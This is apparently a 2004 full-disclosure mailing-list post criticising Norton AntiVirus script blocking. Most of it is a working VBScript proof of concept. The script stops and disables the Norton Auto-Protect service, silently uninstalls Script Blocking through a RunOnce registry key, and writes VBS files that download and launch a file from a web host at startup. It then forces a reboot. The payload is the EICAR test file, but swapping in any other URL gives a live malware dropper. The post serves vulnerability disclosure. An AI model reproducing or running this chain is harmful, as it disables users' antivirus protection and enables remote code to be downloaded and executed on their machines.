Hi All,

I have major issues with the quality of Norton AntiVirus. For some
history, see:

http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html
– Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)

http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html
– Norton AntiVirus 2004/2005 Script Blocking Redux

Symantec’s Response to this issue: (From a week ago)

„ScriptBlocking is intended to provide proactive detection against
script-based worms and this component of Norton AntiVirus has been
effective at doing this since its introduction in 2001”

Huh?

Below is a ‘typical’ script-based virus that Norton AntiVirus will allow
a user to run, without *any* intervention on NAV’s part whatsoever.
It’s likely that code similar to this is already appended to
script-based threats/worms to assist their penetration in the wild.

In a nutshell, here’s what it does:

On Reboot it sets…

1) The NAV Auto-Protect Service to DISABLED
2) A registry key to Uninstall Script Blocking
3) Creates, launches a VBScript file to d/l the EICAR AV ‘test’ virus
4) Launches the EICAR.COM test pattern a few seconds later

….Then Reboots your computer.

The following code was tested under WinXP and a fully LiveUpdated NAV
2005 using a broadband Internet connection. Should be fine for Win2000
and NAV 2004 as well.

————–//// BEGIN DISABLE_NAV.VBS ////—————–

‘ —– DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI —–

sServer = „.”
Set oWMI = GetObject(„winmgmts://.”)

sServiceName = „Norton AntiVirus Auto-Protect Service”
sWQL = „Select state from Win32_Service ” _
& „Where displayname='” & sServiceName & „‘”
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
oService.StopService
oService.ChangeStartMode(„Disabled”)
Next

‘ ——– UNINSTALL SCRIPT BLOCKING WITH WMI 😉 ———-

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = „.”

Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRunOnce”
strValueName = „Uninstall Norton Script Blocking”
arrStringValues = („MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

‘ ——– CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ———

Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRunOnce”
strValueName = „Create Code Downloader”
arrStringValues = („cmd /c ECHO Set
X=CreateObject(„+chr(34)+”Microsoft.XMLHTTP”+chr(34)+”):X.open
„+chr(34)+”GET”+chr(34)+”,(„+chr(34)+”http://www.eicar.org/download/eicar.com”+chr(34)+”),False:X.send:set
Y=createobject(„+chr(34)+”adodb.stream”+chr(34)+”):Y.type=1:Y.open:Y.write
X.responseBody:Y.savetofile(„+chr(34)+”eicar.com”+chr(34)+”),2:Y.close >
estart.VBS”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

‘ ——– CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ———-

Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRunOnce”
strValueName = „Create Code Launcer”
arrStringValues = („cmd /c ECHO wscript.sleep(10000):Set
Z=CreateObject(„+chr(34)+”WSCript.Shell”+chr(34)+”):Z.run(„+chr(34)+”cmd
/k eicar.com”+chr(34)+”) > elaunch.vbs”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

‘ ——– LAUNCH EICAR DOWNLOADER ———-

Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRun”
strValueName = „Execute Code DownLoader”
arrStringValues = („estart.vbs”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

‘ ——– RUN THE ‘VIRUS’ ———-

Set objRegistry =
GetObject(„winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv”)
strKeyPath = „SOFTWAREMicrosoftWindowsCurrentVersionRun”
strValueName = „Execute Malicious Code Launcher”
arrStringValues = („elaunch.vbs”)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

‘ —- USE WMI TO FORCE A REBOOT — NEXT LOGIN, PWN3D —-

Set wmi = GetObject(„winmgmts:{(Shutdown)}”)
set objset = wmi.instancesof(„win32_operatingsystem”)
for each obj in objset
set os = obj : exit for
next
os.win32shutdown 2 + 4

————–//// END DISABLE_NAV.VBS ////—————–

Best Regards,
Daniel Milisic